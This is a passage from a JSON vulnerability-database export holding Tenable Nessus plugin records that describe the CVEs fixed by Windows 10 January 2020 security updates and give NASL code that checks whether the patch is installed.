vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)", "edition": 9, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534306: Windows 10 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534306.NASL", "href": "https://www.tenable.com/plugins/nessus/132865", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132865);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/03/26\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534306\");\n script_xref(name:\"MSFT\", value:\"MS20-4534306\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534306: Windows 10 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534306.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534306/windows-10-update-kb4534306\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?2fd98f0c\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534306.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-0646\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SharePoint Workflows XOML Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/01/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/01/14\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2020 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\nbulletin = \"MS20-01\";\nkbs = make_list('4534306');\n\nif (get_kb_item(\"Host/patch_management_checks\")) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:\"10\",\n sp:0,\n os_build:\"10240\",\n rollup_date:\"01_2020\",\n bulletin:bulletin,\n rollup_kb_list:[4534306])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-05-31T20:43:39", "description": "The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)", "edition": 10, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-01-14T00:00:00", "title": "KB4534276: Windows 10 Version 1709 January 2020 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-0621", "CVE-2020-0638", "CVE-2020-0622", "CVE-2020-0643", "CVE-2020-0632", "CVE-2020-0634", "CVE-2020-0617", "CVE-2020-0627", "CVE-2020-0630", "CVE-2020-0644", "CVE-2020-0614", "CVE-2020-0615", "CVE-2020-0623", "CVE-2020-0628", "CVE-2020-0642", "CVE-2020-0646", "CVE-2020-0613", "CVE-2020-0625", "CVE-2020-0626", "CVE-2020-0641", "CVE-2020-0635", "CVE-2020-0607", "CVE-2020-0633", "CVE-2020-0629", "CVE-2020-0640", "CVE-2020-0639", "CVE-2020-0611", "CVE-2020-0620", "CVE-2020-0631", "CVE-2020-0606", "CVE-2020-0601", "CVE-2020-0605", "CVE-2020-0608"], "modified": "2020-01-14T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS20_JAN_4534276.NASL", "href": "https://www.tenable.com/plugins/nessus/132860", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n\n\n\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\n\n\n\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(132860);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2020/05/27\");\n\n script_cve_id(\n \"CVE-2020-0601\",\n \"CVE-2020-0605\",\n \"CVE-2020-0606\",\n \"CVE-2020-0607\",\n \"CVE-2020-0608\",\n \"CVE-2020-0611\",\n \"CVE-2020-0613\",\n \"CVE-2020-0614\",\n \"CVE-2020-0615\",\n \"CVE-2020-0617\",\n \"CVE-2020-0620\",\n \"CVE-2020-0621\",\n \"CVE-2020-0622\",\n \"CVE-2020-0623\",\n \"CVE-2020-0625\",\n \"CVE-2020-0626\",\n \"CVE-2020-0627\",\n \"CVE-2020-0628\",\n \"CVE-2020-0629\",\n \"CVE-2020-0630\",\n \"CVE-2020-0631\",\n \"CVE-2020-0632\",\n \"CVE-2020-0633\",\n \"CVE-2020-0634\",\n \"CVE-2020-0635\",\n \"CVE-2020-0638\",\n \"CVE-2020-0639\",\n \"CVE-2020-0640\",\n \"CVE-2020-0641\",\n \"CVE-2020-0642\",\n \"CVE-2020-0643\",\n \"CVE-2020-0644\",\n \"CVE-2020-0646\"\n );\n script_xref(name:\"MSKB\", value:\"4534276\");\n script_xref(name:\"MSFT\", value:\"MS20-4534276\");\n script_xref(name:\"IAVA\", value:\"2020-A-0010\");\n\n script_name(english:\"KB4534276: Windows 10 Version 1709 January 2020 Security Update\");\n script_summary(english:\"Checks for rollup.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 4534276.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An information disclosure vulnerability exists when the\n win32k component improperly provides kernel information.\n An attacker who successfully exploited the vulnerability\n could obtain information to further compromise the users\n system. (CVE-2020-0608)\n\n - An information disclosure vulnerability exists in the\n Windows Common Log File System (CLFS) driver when it\n fails to properly handle objects in memory. An attacker\n who successfully exploited this vulnerability could\n potentially read data that was not intended to be\n disclosed. Note that this vulnerability would not allow\n an attacker to execute code or to elevate their user\n rights directly, but it could be used to obtain\n information that could be used to try to further\n compromise the affected system. (CVE-2020-0615,\n CVE-2020-0639)\n\n - An elevation of privilege vulnerability exists in\n Windows when the Win32k component fails to properly\n handle objects in memory. An attacker who successfully\n exploited this vulnerability could run arbitrary code in\n kernel mode. An attacker could then install programs;\n view, change, or delete data; or create new accounts\n with full user rights. (CVE-2020-0642)\n\n - A remote code execution vulnerability exists in .NET\n software when the software fails to check the source\n markup of a file. An attacker who successfully exploited\n the vulnerability could run arbitrary code in the\n context of the current user. If the current user is\n logged on with administrative user rights, an attacker\n could take control of the affected system. An attacker\n could then install programs; view, change, or delete\n data; or create new accounts with full user rights.\n (CVE-2020-0605, CVE-2020-0606)\n\n - A denial of service vulnerability exists when Microsoft\n Hyper-V Virtual PCI on a host server fails to properly\n validate input from a privileged user on a guest\n operating system. (CVE-2020-0617)\n\n - A security feature bypass vulnerability exists in\n Windows 10 when third party filters are called during a\n password update. Successful exploitation of the\n vulnerability could allow a user to make use of a\n blocked password for their account. (CVE-2020-0621)\n\n - An information disclosure vulnerability exists in the\n way that the Windows Graphics Device Interface Plus\n (GDI+) handles objects in memory, allowing an attacker\n to retrieve information from a targeted system. By\n itself, the information disclosure does not allow\n arbitrary code execution; however, it could allow\n arbitrary code to be run if the attacker uses it in\n combination with another vulnerability. (CVE-2020-0643)\n\n - A remote code execution vulnerability exists when\n Internet Explorer improperly accesses objects in memory.\n The vulnerability could corrupt memory in such a way\n that an attacker could execute arbitrary code in the\n context of the current user. An attacker who\n successfully exploited the vulnerability could gain the\n same user rights as the current user. (CVE-2020-0640)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Windows when Windows fails to properly handle\n certain symbolic links. An attacker who successfully\n exploited this vulnerability could potentially set\n certain items to run at a higher level and thereby\n elevate permissions. (CVE-2020-0635)\n\n - An information disclosure vulnerability exists when the\n Microsoft Windows Graphics Component improperly handles\n objects in memory. An attacker who successfully\n exploited the vulnerability could obtain information to\n further compromise the users system. (CVE-2020-0622)\n\n - An elevation of privilege vulnerability exists in the\n way that the Windows Search Indexer handles objects in\n memory. An attacker who successfully exploited the\n vulnerability could execute code with elevated\n permissions. (CVE-2020-0613, CVE-2020-0614,\n CVE-2020-0623, CVE-2020-0625, CVE-2020-0626,\n CVE-2020-0627, CVE-2020-0628, CVE-2020-0629,\n CVE-2020-0630, CVE-2020-0631, CVE-2020-0632,\n CVE-2020-0633)\n\n - An elevation of privilege vulnerability exists in the\n way the Update Notification Manager handles files.\n (CVE-2020-0638)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Cryptographic Services improperly handles\n files. An attacker could exploit the vulnerability to\n overwrite or modify a protected file leading to a\n privilege escalation. (CVE-2020-0620)\n\n - An elevation of privilege vulnerability exists when the\n Windows Common Log File System (CLFS) driver improperly\n handles objects in memory. An attacker who successfully\n exploited this vulnerability could run processes in an\n elevated context. (CVE-2020-0634)\n\n - An elevation of privilege vulnerability exists in\n Windows Media Service that allows file creation in\n arbitrary locations. (CVE-2020-0641)\n\n - An information disclosure vulnerability exists in the\n way that Microsoft Graphics Components handle objects in\n memory. An attacker who successfully exploited the\n vulnerability could obtain information that could be\n useful for further exploitation. (CVE-2020-0607)\n\n - A remote code execution vulnerability exists when the\n Microsoft .NET Framework fails to validate input\n properly. An attacker who successfully exploited this\n vulnerability could take control of an affected system.\n An attacker could then install programs; view, change,\n or delete data; or create new accounts with full user\n rights. Users whose accounts are configured to have\n fewer user rights on the system could be less impacted\n than users who operate with administrative user rights.\n (CVE-2020-0646)\n\n - A remote code execution vulnerability exists in the\n Windows Remote Desktop Client when a user connects to a\n malicious server. An attacker who successfully exploited\n this vulnerability could execute arbitrary code on the\n computer of the connecting client. An attacker could\n then install programs; view, change, or delete data; or\n create new accounts with full user rights.\n (CVE-2020-0611)\n\n - An elevation of privilege vulnerability exists when\n Microsoft Windows implements predictable memory section\n names. An attacker who successfully exploited this\n vulnerability could run arbitrary code as system. An\n attacker could then install programs; view, change, or\n delete data; or create new accounts with full user\n rights. (CVE-2020-0644)\n\n - A spoofing vulnerability exists in the way Windows\n CryptoAPI (Crypt32.dll) validates Elliptic Curve\n Cryptography (ECC) certificates. An attacker could\n exploit the vulnerability by using a spoofed code-\n signing certificate to sign a malicious executable,\n making it appear the file was from a trusted, legitimate\n source. The user would have no way of knowing the file\n was malicious, because the digital signature would\n appear to be from a trusted provider. A successful\n exploit could also allow the attacker to conduct man-in-\n the-middle attacks and decrypt confidential information\n on user connections to the affected software. The\n security update addresses the vulnerability by ensuring\n that Windows CryptoAPI completely validates ECC\n certificates. (CVE-2020-0601)\");\n # https://support.microsoft.com/en-us/help/4534276/windows-10-update-kb4534276\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?3c9c3e46\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB4534276.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n 